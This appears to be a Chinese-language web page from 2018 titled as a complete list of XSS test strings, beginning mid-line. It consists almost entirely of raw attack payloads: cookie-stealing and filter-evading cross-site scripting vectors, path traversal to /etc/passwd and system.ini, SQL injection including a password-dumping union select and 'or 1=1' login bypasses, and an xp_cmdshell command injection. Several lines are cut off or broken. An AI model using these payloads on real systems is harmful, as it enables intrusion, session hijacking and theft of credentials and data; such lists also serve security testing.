XSS测试语句大全
2018-09-06 11:13
kie)</script>
=><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert(XSS)%3C/script%3E
<script>alert(XSS)</script>
<img src=javascript:alert(XSS)>
%0a%0a<script>alert(\Vulnerable\)</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert(Vulnerable);</script>
<script>alert(Vulnerable)</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert(Vulnerable)</script>
a/
a?<script>alert(Vulnerable)</script>
><script>alert(Vulnerable)</script>
;exec%20master..xp_cmdshell%20dir%20 c:%20>%20c:\inetpub\
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
;!--<XSS>=&{()}
<IMG src=javascript:alert(XSS);>
<IMG src=javascript:alert(XSS)>
<IMG src=JaVaScRiPt:alert(XSS)>
<IMG src=JaVaScRiPt:alert("XSS")>
<IMG src=javascript:alert('XSS')>
<IMG src=javascript:alert('XSS')>
<IMG src=javascript:alert('XSS')>
<IMG src=jav ascript:alert(XSS);>
<IMG src=jav
ascript:alert(XSS);>
<IMG src=jav
ascript:alert(XSS);>
<IMG src=java\0script:alert(\XSS\)>; > out
<IMG src= javascript:alert(XSS);>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND=javascript:alert(XSS)>
<BODY ONLOAD=alert(XSS)>
<IMG DYNSRC=javascript:alert(XSS)>
<IMG LOWSRC=javascript:alert(XSS)>
<BGSOUND src=javascript:alert(XSS);>
<br size=&{alert(XSS)}>
<LAYER src=
<LINK REL=stylesheet HREF=javascript:alert(XSS);>
<IMG src=vbscript:msgbox(XSS)>
<IMG src=mocha:[code]>
<IMG src=livescript:[code]>
<META HTTP-EQUIV=refresh CONTENT=0;url=javascript:alert(XSS);>
<IFRAME src=javascript:alert(XSS)></IFRAME>
<FRAMESET><FRAME src=javascript:alert(XSS)></FRAME></FRAMESET>
<TABLE BACKGROUND=javascript:alert(XSS)>
<DIV STYLE=background-image: url(javascript:alert(XSS))>
<DIV STYLE=behaviour: url(
<DIV STYLE=width: expression(alert(XSS));>
<STYLE>@im\port\ja\vasc\ript:alert(XSS);</STYLE>
<IMG STYLE=xss:expre\ssion(alert(XSS))>
<STYLE TYPE=text/javascript>alert(XSS);</STYLE>
<STYLE TYPE=text/css>.XSS{background-image:url(javascript:alert(XSS));}</STYLE><A CLASS=XSS></A>
<STYLE type=text/css>BODY{background:url(javascript:alert(XSS))}</STYLE>
<BASE HREF=javascript:alert(XSS);//>
getURL(javascript:alert(XSS))
a=get;b=URL;c=javascript:;d=alert(XSS);;eval(a+b+c+d);
<XML src=javascript:alert(XSS);>
> <BODY ONLOAD=a();><SCRIPT>function a(){alert(XSS);}</SCRIPT><
<SCRIPT src=
<IMG src=javascript:alert(XSS)
<!--#exec cmd=/bin/echo <SCRIPT src--><!--#exec cmd=/bin/echo =
<IMG src=
<SCRIPT a=> src=
<SCRIPT => src=
<SCRIPT a=> src=
<SCRIPT a=> src=
<SCRIPT>document.write(<SCRI);</SCRIPT>PT src=
<A HREF=
admin--
or 0=0 --
or 0=0 --
or 0=0 --
or 0=0 #
or 0=0 #
or 0=0 #
or x=x
or x=x
) or (x=x
or 1=1--
or 1=1--
or 1=1--
or a=a--
or a=a
) or (a=a
) or (a=a
hi or a=a
hi or 1=1 --
hi or 1=1 --
hi or a=a
hi) or (a=a
hi) or (a=a